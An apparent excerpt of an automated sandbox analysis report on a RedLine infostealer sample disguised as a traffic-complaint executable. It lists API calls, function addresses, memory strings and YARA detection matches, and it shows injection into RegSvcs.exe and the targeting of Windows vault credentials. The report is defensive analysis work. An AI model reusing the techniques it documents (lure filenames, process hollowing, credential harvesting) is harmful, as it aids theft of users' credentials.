Code function: 0_2_00C10219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00C10219

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C3CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_00C3CDAC
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		8_2_00A4CDAC

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.name.exe.33a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.name.exe.3710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00BB3B4C
Source: Case_Your company bad driver Vehicle No.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Case_Your company bad driver Vehicle No.exe, 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_847bcc26-5
Source: Case_Your company bad driver Vehicle No.exe, 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4d9c76af-9
Source: Case_Your company bad driver Vehicle No.exe, 00000000.00000003.3276476256.0000000003E55000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8fb44ef2-6
Source: Case_Your company bad driver Vehicle No.exe, 00000000.00000003.3276476256.0000000003E55000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c659b848-3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: This is a third-party compiled AutoIt script.	8_2_009C3B4C
Source: name.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: name.exe, 00000008.00000000.3288300355.0000000000A75000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a59d631b-0
Source: name.exe, 00000008.00000000.3288300355.0000000000A75000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_122a512e-b
Source: name.exe, 0000000A.00000000.3302257996.0000000000A75000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_cba64940-b
Source: name.exe, 0000000A.00000000.3302257996.0000000000A75000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_af207b85-7
Source: name.exe, 0000000E.00000002.3448805227.0000000000A75000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_01034b26-c
Source: name.exe, 0000000E.00000002.3448805227.0000000000A75000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_70c22f54-3
Source: Case_Your company bad driver Vehicle No.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9f1ae70c-5
Source: Case_Your company bad driver Vehicle No.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ce67c117-1
Source: name.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_426733da-3
Source: name.exe.0.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_94d126c4-d

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C140B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_00C140B1

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C08858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00C08858

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_00C1545F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		8_2_00A2545F

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BBE800	0_2_00BBE800
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BDDBB5	0_2_00BDDBB5
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C3804A	0_2_00C3804A
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BBE060	0_2_00BBE060
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BC4140	0_2_00BC4140
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BD2405	0_2_00BD2405
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BE6522	0_2_00BE6522
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C30665	0_2_00C30665
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BE267E	0_2_00BE267E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BD283A	0_2_00BD283A
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BC6843	0_2_00BC6843
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BE89DF	0_2_00BE89DF
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C30AE2	0_2_00C30AE2
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BE6A94	0_2_00BE6A94
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BC8A0E	0_2_00BC8A0E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C0EB07	0_2_00C0EB07
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C18B13	0_2_00C18B13
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BDCD61	0_2_00BDCD61
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BE7006	0_2_00BE7006
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BC3190	0_2_00BC3190
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BC710E	0_2_00BC710E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BB1287	0_2_00BB1287
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BD33C7	0_2_00BD33C7
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BDF419	0_2_00BDF419
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BC5680	0_2_00BC5680
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BD16C4	0_2_00BD16C4
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BD78D3	0_2_00BD78D3
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BC58C0	0_2_00BC58C0
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BD1BB8	0_2_00BD1BB8
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BE9D05	0_2_00BE9D05
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BBFE40	0_2_00BBFE40
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BDBFE6	0_2_00BDBFE6
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00BD1FD0	0_2_00BD1FD0
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_015136F0	0_2_015136F0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009CE800	8_2_009CE800
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009EDBB5	8_2_009EDBB5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A4804A	8_2_00A4804A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009CE060	8_2_009CE060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009D4140	8_2_009D4140
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009E2405	8_2_009E2405
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009F6522	8_2_009F6522
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A40665	8_2_00A40665
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009F267E	8_2_009F267E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009E283A	8_2_009E283A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009D6843	8_2_009D6843
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009F89DF	8_2_009F89DF
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009F6A94	8_2_009F6A94
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A40AE2	8_2_00A40AE2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009D8A0E	8_2_009D8A0E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A1EB07	8_2_00A1EB07
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A28B13	8_2_00A28B13
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009ECD61	8_2_009ECD61
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009F7006	8_2_009F7006
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009D3190	8_2_009D3190
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009D710E	8_2_009D710E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009C1287	8_2_009C1287
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009E33C7	8_2_009E33C7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009EF419	8_2_009EF419
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009D5680	8_2_009D5680
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009E16C4	8_2_009E16C4
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009E78D3	8_2_009E78D3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009D58C0	8_2_009D58C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009E1BB8	8_2_009E1BB8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009F9D05	8_2_009F9D05
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009CFE40	8_2_009CFE40
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009E1FD0	8_2_009E1FD0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_009EBFE6	8_2_009EBFE6
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00F136F0	8_2_00F136F0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 10_2_00F036F0	10_2_00F036F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00408C60	11_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0040DC11	11_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00407C3F	11_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00418CCC	11_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00406CA0	11_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_004028B0	11_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_0041A4BE	11_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00418244	11_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00401650	11_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00402F20	11_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_004193C4	11_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00418788	11_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00402F89	11_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_00402B90	11_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_004073A0	11_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02ABD090	11_2_02ABD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02ABD960	11_2_02ABD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02ABCD48	11_2_02ABCD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02AB1030	11_2_02AB1030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A2C4C0	11_2_05A2C4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A2E780	11_2_05A2E780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A26FF9	11_2_05A26FF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A24C20	11_2_05A24C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A25428	11_2_05A25428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A28F48	11_2_05A28F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A2EED0	11_2_05A2EED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A20007	11_2_05A20007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_05A20040	11_2_05A20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_063C4DF8	11_2_063C4DF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_063C9BF8	11_2_063C9BF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_063C0CF0	11_2_063C0CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_063C8268	11_2_063C8268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_063CE2E8	11_2_063CE2E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_02D3CD48	15_2_02D3CD48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_02D3D960	15_2_02D3D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_02D3D090	15_2_02D3D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_02D31030	15_2_02D31030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_03258B80	15_2_03258B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0325E780	15_2_0325E780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_03256485	15_2_03256485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0325C4C0	15_2_0325C4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_03250006	15_2_03250006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_03250040	15_2_03250040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_03264DF0	15_2_03264DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_03269CD0	15_2_03269CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_0326E2D8	15_2_0326E2D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_03267FB0	15_2_03267FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 15_2_03260CF0	15_2_03260CF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: String function: 00BD0D27 appears 70 times
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: String function: 00BB7F41 appears 35 times
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: String function: 00BD8B40 appears 42 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 009E0D27 appears 70 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 009C7F41 appears 35 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 009E8B40 appears 42 times

Source: Case_Your company bad driver Vehicle No.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 14.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
